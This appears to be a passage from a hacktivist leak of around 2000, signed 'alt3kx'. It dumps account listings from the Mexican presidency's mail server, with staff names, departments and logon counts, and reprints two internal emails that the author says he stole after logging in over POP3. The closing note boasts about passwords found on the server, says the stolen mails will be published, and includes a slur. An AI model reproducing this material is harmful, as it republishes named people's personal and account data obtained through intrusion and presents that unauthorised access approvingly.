Comment :CAC - Coord. Admiva.User Comment :Full name :Alejandro Contla Hosking

Account Name :Administrator

The Administrator account is an ADMINISTRATOR, and the password waschanged 0 days ago. This account has been used 847 times to logon.The default Administrator account has not been renamed. Consider renaming this accountand removing most of its rights. Use a differnet account as the admin account.

Comment :Built-in account for administering the computer/domainUser Comment :Full name :

Account Name :afernand@presidencia.gob.mx

The afernand account is a normal USER, and the password waschanged 0 days ago. This account has been used 4 times to logon.

Comment :Politica

User Comment :Full name :Alejandra Fernandez Wong

Account Name :afrias@presidencia.gob.mx

The afrias account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :DGCS - PublicacionesUser Comment :Full name :Alfonso Manuel Frias Badillo

Account Name :agomez@presidencia.gob.mx

The agomez account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :Consejeria JuridicaUser Comment :Full name :Alfredo Gomez Aguirre

Account Name :agomezg@presidencia.gob.mx

The agomezg account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :DGCS - Analisis y EvaluacionUser Comment :Full name :Andres Gomez Glokner

Account Name :agonzale@presidencia.gob.mx

The agonzale account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :CAC - DGPAUser Comment :Full name :Angel Gonzalez Amozorrutia

Account Name :WWW$

The caltamir account is a normal USER, and the password waschanged 0 days ago. This account has been used 0 times to logon.

Comment :User Comment :

Full name :

Un mail ke por ahi me he hurtado solo para saber como van las cosas :-)

****************************************************************************

+OK Microsoft Exchange POP3 server version 5.5.2650.23 ready+OK+OK User successfully logged on

Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx withSMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id VCFMTPYN; Tue, 17 Oct 2000 07:58:59 +0100Message-ID: <39EC4D44.144F4269@presidencia.gob.mx>Date: Tue, 17 Oct 2000 07:59:48 -0500From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <ohernand@presidencia.gob.mx>X-Mailer: Mozilla 4.5 [es] (Win98; I)X-Accept-Language: esMIME-Version: 1.0To: usuarios@presidencia.gob.mxSubject: Cambio de Servidor de CorreoContent-Type: text/plain; charset=iso-8859-1Content-Transfer-Encoding: 8bit

Debido a que fue necesario cambiar el servidor de correo por uno de mascapacidad, es posible que en este cambio se hayan perdido algunoscorreos, tanto al recibir como al enviar. Por lo cual le sugerimosreenviar o solicitar aquellos correos que ud. considere importantes. Asimismo se les informa que durante el dia de hoy puede haber problemas enla recepcion de correos debido a que los cambios realizados tardanaproximadamente 24 horas en ser difundidos en internet.

por su comprension gracias..

*****************************************************************************

+OK Microsoft Exchange POP3 server version 5.5.2650.23 ready+OK+OK User successfully logged on

Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id VYCDD7WK; Tue, 14 Nov 2000 22:33:04 -0000Message-ID: <3A120416.D5350062@presidencia.gob.mx>Date: Tue, 14 Nov 2000 22:33:43 -0500From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <ohernand@presidencia.gob.mx>

X-Mailer: Mozilla 4.5 [es] (Win98; I)X-Accept-Language: esMIME-Version: 1.0To: usuarios@presidencia.gob.mxSubject: Nuevo VirusContent-Type: multipart/alternative;boundary="------------68EDA2B8A569812A6DD1AA9A"

--------------68EDA2B8A569812A6DD1AA9AContent-Type: text/plain; charset=us-asciiContent-Transfer-Encoding: 7bit

???? CUIDADO !!!!

NO ABRAN EL MAIL CON EL ARCHIVO ADJUNTO "NAVIDAD.EXE ",NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LACOMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DEDIRECCIONES.

.

--------------68EDA2B8A569812A6DD1AA9AContent-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en"><html><font color="#FF0000">???? CUIDADO !!!!</font><p><font color="#CC0000">NO ABRAN EL MAIL</font> CON EL ARCHIVO ADJUNTO<font color="#FF0000">"NAVIDAD.EXE "</font>,<br>NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA.COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DEDIRECCIONES.</html>

--------------68EDA2B8A569812A6DD1AA9A--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=NOTA: ESTE ARTICULO FUE ENVIADO A LA GENTE RESPONSABLE DE WWW.PRESIDENCIA.GOB.MX

ANTES DE SER PUBLICADO, ESTO ES POR SI NO CONOCEN AUN TODAS LAS FALLAS, HE

ENVIADO UN ESCRITO MUY BREVE Y PASSWORDS ENCONTRADOS EN SU SERVIDOR , ASI KE YO ESPERO KE CORRIJAN LA FALLAS AKI EXPUESTAS, AUN NO HE RECIBIDO

RESPUESTA ASI KE ESTE TEXTO LO PUBLICARE JUNTO CON MAILS KE HE OBTENIDO,

POR ULTIMO AGREGO ESTA LINEA...

"FUCK ASSHOLE BRAZILIAN"

ATTE: alt3kx!Greet to: dr_fdisk^ _0x90_ x-ploitHacktivism! rUL3Z!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=